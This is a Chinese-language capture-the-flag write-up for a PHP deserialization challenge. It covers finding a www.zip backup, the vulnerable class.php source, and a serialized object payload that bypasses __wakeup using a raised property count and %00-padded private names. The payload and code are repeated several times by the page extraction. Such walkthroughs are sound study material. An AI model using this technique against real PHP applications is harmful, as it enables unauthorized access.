![[极客大挑战 2019]PHP,网络安全爱好者中心-神域博客网](https://img.godyu.com/2023/12/20231226130333552.png)
因为每次猫猫都在我键盘上乱跳,所以我有一个良好的备份网站的习惯 不愧是我!!!
![图片[1]-[极客大挑战 2019]PHP-安全小天地](https://img.godyu.com/2023/12/20231226130333552.png?imageView2/0/format/webp/q/75)
这不就是文件扫描,dirb什么的都可以,经过一番测试,备份文件名为www.zip
直接在url后面输入www.zip,可以获取到网站的备份,打开以后可以看到有三个php,一个个看过去
![图片[2]-[极客大挑战 2019]PHP-安全小天地](https://img.godyu.com/2023/12/20231226210334802.png?imageView2/0/format/webp/q/75)
下载下来的flag.php里的flag显然不是正确答案。继续看。重点是class.php,可以看到php的魔术方法,应该存在php反序列化漏洞.
##flag.php<?php$flag = \'Syc{dog_dog_dog_dog}\';?>##flag.php <?php $flag = \'Syc{dog_dog_dog_dog}\'; ?>##flag.php <?php $flag = \'Syc{dog_dog_dog_dog}\'; ?>
## class.php<?phpinclude \'flag.php\';error_reporting(0);class Name{private $username = \'nonono\';private $password = \'yesyes\';public function __construct($username,$password){$this->username = $username;$this->password = $password;}function __wakeup(){$this->username = \'guest\';}function __destruct(){if ($this->password != 100) {echo \"</br>NO!!!hacker!!!</br>\";echo \"You name is: \";echo $this->username;echo \"</br>\";echo \"You password is: \";echo $this->password;echo \"</br>\";die();}if ($this->username === \'admin\') {global $flag;echo $flag;}else{echo \"</br>hello my friend~~</br>sorry i can\'t give you the flag!\";die();}}}$a= new Name(\'admin\',100);$b= serialize($a);var_dump($b);?>## class.php <?php include \'flag.php\'; error_reporting(0); class Name{ private $username = \'nonono\'; private $password = \'yesyes\'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = \'guest\'; } function __destruct(){ if ($this->password != 100) { echo \"</br>NO!!!hacker!!!</br>\"; echo \"You name is: \"; echo $this->username;echo \"</br>\"; echo \"You password is: \"; echo $this->password;echo \"</br>\"; die(); } if ($this->username === \'admin\') { global $flag; echo $flag; }else{ echo \"</br>hello my friend~~</br>sorry i can\'t give you the flag!\"; die(); } } } $a= new Name(\'admin\',100); $b= serialize($a); var_dump($b); ?>## class.php <?php include \'flag.php\'; error_reporting(0); class Name{ private $username = \'nonono\'; private $password = \'yesyes\'; public function __construct($username,$password){ $this->username = $username; $this->password = $password; } function __wakeup(){ $this->username = \'guest\'; } function __destruct(){ if ($this->password != 100) { echo \"</br>NO!!!hacker!!!</br>\"; echo \"You name is: \"; echo $this->username;echo \"</br>\"; echo \"You password is: \"; echo $this->password;echo \"</br>\"; die(); } if ($this->username === \'admin\') { global $flag; echo $flag; }else{ echo \"</br>hello my friend~~</br>sorry i can\'t give you the flag!\"; die(); } } } $a= new Name(\'admin\',100); $b= serialize($a); var_dump($b); ?>
index.php ,会调用class.php,以及对输入反序列化,而反序列化后调用_wakeup会直接覆盖输入的用户名。一个简单的办法是直接在class下面创建一个对象然后序列化。
$a= new Name(\'admin\',100);$b= serialize($a);var_dump($b);$a= new Name(\'admin\',100); $b= serialize($a); var_dump($b);$a= new Name(\'admin\',100); $b= serialize($a); var_dump($b);
![图片[3]-[极客大挑战 2019]PHP-安全小天地](https://img.godyu.com/2023/12/20231226210335879.png?imageView2/0/format/webp/q/75)
然后因为要绕过wakeup,把Name后的数字改成3.因为username和password是私有变量,变量中的类名前后会有空白符,而复制的时候会丢失,所以要加上%00
最后payload:
O:4:\"Name\":3:{s:14:\"%00Name%00username\";s:5:\"admin\";s:14:\"%00Name%00password\";i:100;}O:4:\"Name\":3:{s:14:\"%00Name%00username\";s:5:\"admin\";s:14:\"%00Name%00password\";i:100;}O:4:\"Name\":3:{s:14:\"%00Name%00username\";s:5:\"admin\";s:14:\"%00Name%00password\";i:100;}
![图片[4]-[极客大挑战 2019]PHP-安全小天地](https://img.godyu.com/2023/12/20231226210336850.png?imageView2/0/format/webp/q/75)
提交得到flag为flag{a2b4de76-c0d9-40fe-be16-46f06741eeea}
THE END
暂无评论内容